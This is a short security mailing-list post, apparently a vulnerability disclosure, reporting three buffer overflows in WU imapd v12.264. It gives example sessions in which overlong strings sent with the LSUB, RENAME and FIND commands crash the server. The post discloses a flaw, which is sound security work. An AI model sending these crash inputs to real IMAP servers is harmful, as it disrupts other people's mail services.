Re: another WU imapd buffer overflow

[siva9 () CLICO PL (Michal Szymanski)]

Hi again,

imapd seems to be very weak. I've found another three buffer overruns.
This time affected commands are LSUB, RENAME and FIND:

* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)

SIGSEGV received.

It seems that all two-argument commands in authenticated state - where second
argument is string - are vulnerable.  I'm not sure, but ipop2/3d works fine in
all states, also in transaction state. Mark, Am I right?

Regards,

Michal Szymanski [michal_szymanski () linux com pl];